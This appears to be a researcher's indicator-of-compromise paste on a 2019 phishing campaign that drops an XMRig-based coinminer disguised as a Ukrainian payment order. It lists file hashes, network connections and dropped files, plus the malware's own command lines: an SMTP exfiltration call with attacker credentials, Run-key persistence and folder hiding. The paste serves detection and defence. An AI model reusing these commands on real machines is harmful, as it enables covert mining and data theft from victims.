
#coinminer_150319

VRad Mar 20th, 2019 (edited)
#IOC #OptiData #VR #coinminer #bmcon #SCR

https://pastebin.com/eTPuCkhC

previous contact:
https://pastebin.com/ELpZTc1y

attack_vector
--------------
email attach > SCR > C:\Intel\*

email_headers
--------------
n/a

files
--------------
SHA-256     fd32435ce01a45ddc600edd467787586712408978f0807c12dc622824eb2f93e
File name   Платіжне доручення 1C №14343676173 - 2019.rar        [RAR archive data, vd4,]
File size   735.93 KB

SHA-256     5850342390bb431b1a0dc364156bff767444cf50987a4c743ff9a29b79e3a10e
File name   Платіжне доручення 1C №14343676173 - 2019.scr        [PE32 executable (GUI) Intel 80386, for MS Windows]
File size   793.76 KB

SHA-256     40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34
File name   bmcon.exe                       [Intel 80386, for MS Windows, UPX compressed]
File size   354.5 KB (363008 bytes)

SHA-256     1f56e296848ecb8150b81648551515b89d789cde037db18d153be6003b5a1918
File name   sender.exe                      [Intel 80386, for MS Windows]
File size   220 KB (225280 bytes)

SHA-256     b4633ffa43df5e8887714ce7dd580f80455050a552de4665ab1fdafd13c36ca7
File name   bm-xmrig.exe                        [PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows]
File size   750.5 KB (768512 bytes)

activity
**************
SEND SMTP_587
--------------
220 vserver321.axc.nl ESMTP Exim 4.91 Wed, 20 Mar 2019 15:55:26 +0100
EHLO apm11
250-vserver321.axc.nl Hello apm11 [victim-Public-IP]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
AUTH PLAIN AHNlbmRlckBkb3dubG9hZC1maWxlcy5zaXRlAGVwc2lsb25lcmlkYW5h
235 Authentication succeeded
MAIL FROM:<sender@download-files.site> BODY=8BITMIME
250 OK
RCPT TO:<recipient@account-identification.site>
250 Accepted
DATA
354 Enter message, ending with "." on a line by itself
Date: Tue, 19 Mar 2019 14:39:17 +0200
From: Robot Ukr<sender@download-files.site>
To: recipient@account-identification.site
X-Mailer: Blat v3.0.7, a Win32 SMTP/NNTP mailer http://www.blat.net
Message-ID: <01d4de50$Blat.v3.0.7$c4997ae5$478b0b0efc2@download-files.site>
Subject: PC-APM11/User-support
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain;
 charset="UTF-8"

OS-Windows7 x64/CPU-*** 2.50GHz/Cores-2/G=
PU-...................... VGA ...................... ..............
.
250 OK id=1h6ccp-002kK0-KG
QUIT
221 vserver321.axc.nl closing connection

netwrk
--------------
http
93.184.221.240  ctldl.windowsupdate.com     GET /msdownload/update/v3/static/...        HTTP/1.1    Microsoft-CryptoAPI/6.1
178.18.231.122  isrg.trustid.ocsp.identrust.com GET /MFEwTzBNMEswSTAJBgUrD...           HTTP/1.1    Microsoft-CryptoAPI/6.1
178.18.231.114  ocsp.int-x3.letsencrypt.org GET /MFMwUTBPME0wSzAJBgUrD...           HTTP/1.1    Microsoft-CryptoAPI/6.1
93.184.221.240  ctldl.windowsupdate.com     GET /msdownload/update/v3/static/t...       HTTP/1.1    Microsoft-CryptoAPI/6.1
178.18.231.121  crl.microsoft.com       GET /pki/crl/products/MicrosoftTimeStampPCA.crl HTTP/1.1    Microsoft-CryptoAPI/6.1

ssl
88.99.38.225    dl.browsermine.com      Client Hello

comp
--------------
bmcon.exe   3064    TCP localhost   49518   88.99.38.225    443 ESTABLISHED
bmcon.exe   3064    TCP localhost   49519   93.184.221.240  80  ESTABLISHED
bmcon.exe   3064    TCP localhost   49520   178.18.231.122  80  ESTABLISHED
bmcon.exe   3064    TCP localhost   49521   178.18.231.114  80  ESTABLISHED
bmcon.exe   3064    TCP localhost   49522   88.99.38.225    443 ESTABLISHED

bm-xmrig.exe    1776    TCP localhost   49524   159.69.189.115  4444    ESTABLISHED

svchost.exe 244 TCP localhost   49525   93.184.221.240  80  ESTABLISHED
svchost.exe 244 TCP localhost   49526   178.18.231.121  80  ESTABLISHED

proc
--------------
"C:\Users\operator\Desktop\Платіжне доручення 1C №14343676173 - 2019.scr" /S
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde

C:\Windows\SysWOW64\cmd.exe ""C:\Intel\enable.cmd" "
C:\Windows\SysWOW64\reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Интегрированные_драйвера" /f

C:\Windows\SysWOW64\powercfg.exe -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
C:\Windows\SysWOW64\powercfg.exe -change -standby-timeout-ac 0
C:\Windows\SysWOW64\powercfg.exe -change -hibernate-timeout-ac 0
C:\Windows\SysWOW64\powercfg.exe  -h off

C:\Windows\SysWOW64\attrib.exe ATTRIB  +s +h C:\Intel
C:\Windows\SysWOW64\attrib.exe ATTRIB  +s +h C:\Intel\bmcon

C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr .

C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "="
C:\Intel\sender.exe  -to recipient@account-identification.site -f "Robot Ukr<sender@download-files.site>" -server smtp.download-files.site -port 587 -u sender@download-files.site -pw epsiloneridana -subject  "PC-APM11/User-support" -body  "OS-Windows7 x64/CPU-*** CPU @ ***GHz/Cores-2/GPU-Стандартный VGA графический адаптер"

C:\Windows\SysWOW64\reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v private /t reg_sz /d "C:\Intel\private.exe" /f

C:\Windows\SysWOW64\PING.EXE ping  -n 300 127.0.0.1

C:\Intel\bmcon.exe
"C:\Intel\bmcon\bmstart.exe" --conf="C:\Intel\bmcon.json"
"C:\Intel\bmcon\bm-xmrig.exe"

persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run              19.03.2019 14:39

#1 BMCon            c:\intel\bmcon.exe  03.11.2018 2:42

#2 private  17.229.13.523.351 18.14.13.5356 Installation        17.19.11.15
c:\intel\private.exe    20.06.1992 0:22

drop
--------------
C:\Intel\GfxUI.exe.config
C:\Intel\IGFXDEVLib.dll
C:\Intel\iglhxa32.vp
C:\Intel\Impcd.cat
C:\Intel\IntcDAuC.dll
C:\Intel\mup.xml
C:\Intel\private.exe
C:\Intel\readme-VGA.txt
C:\Intel\sender.exe
C:\Intel\Setup2.if2

C:\Intel\bmcon\apps.json
C:\Intel\bmcon\bmstart.exe
C:\Intel\bmcon\bm-xmrig.exe
C:\Intel\bmcon\bm-xmrig.json
C:\Intel\bmcon\bm-xmrig-amd.exe
C:\Intel\bmcon\bm-xmrig-amd.json
C:\Intel\bmcon\bm-xmrig-nvidia.exe
C:\Intel\bmcon\bm-xmrig-nvidia.json
C:\Intel\bmcon\bm-xmrig-nvidia-cuda8.exe
C:\Intel\bmcon\bm-xmrig-nvidia-cuda10.exe
C:\Intel\bmcon\bm-xmrig-x32.exe
C:\Intel\bmcon\nvrtc64_80.dll
C:\Intel\bmcon\nvrtc64_100_0.dll
C:\Intel\bmcon\nvrtc-builtins64_80.dll
C:\Intel\bmcon\nvrtc-builtins64_100.dll
C:\Intel\bmcon.exe
C:\Intel\bmcon.json

# # #
https://www.virustotal.com/gui/file/fd32435ce01a45ddc600edd467787586712408978f0807c12dc622824eb2f93e/details
https://www.virustotal.com/gui/file/5850342390bb431b1a0dc364156bff767444cf50987a4c743ff9a29b79e3a10e/details
https://analyze.intezer.com/#/analyses/b2d98806-3481-4422-9f5c-07ffe8707cde

https://www.virustotal.com/gui/file/40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34/details
https://www.virustotal.com/gui/file/1f56e296848ecb8150b81648551515b89d789cde037db18d153be6003b5a1918/details
https://www.virustotal.com/gui/file/f887f9c7b425495ad336ca8125a5dd8ee9a9353ce3431407f45d085d76b1be04/details
https://www.virustotal.com/gui/file/b4633ffa43df5e8887714ce7dd580f80455050a552de4665ab1fdafd13c36ca7/details

VR

@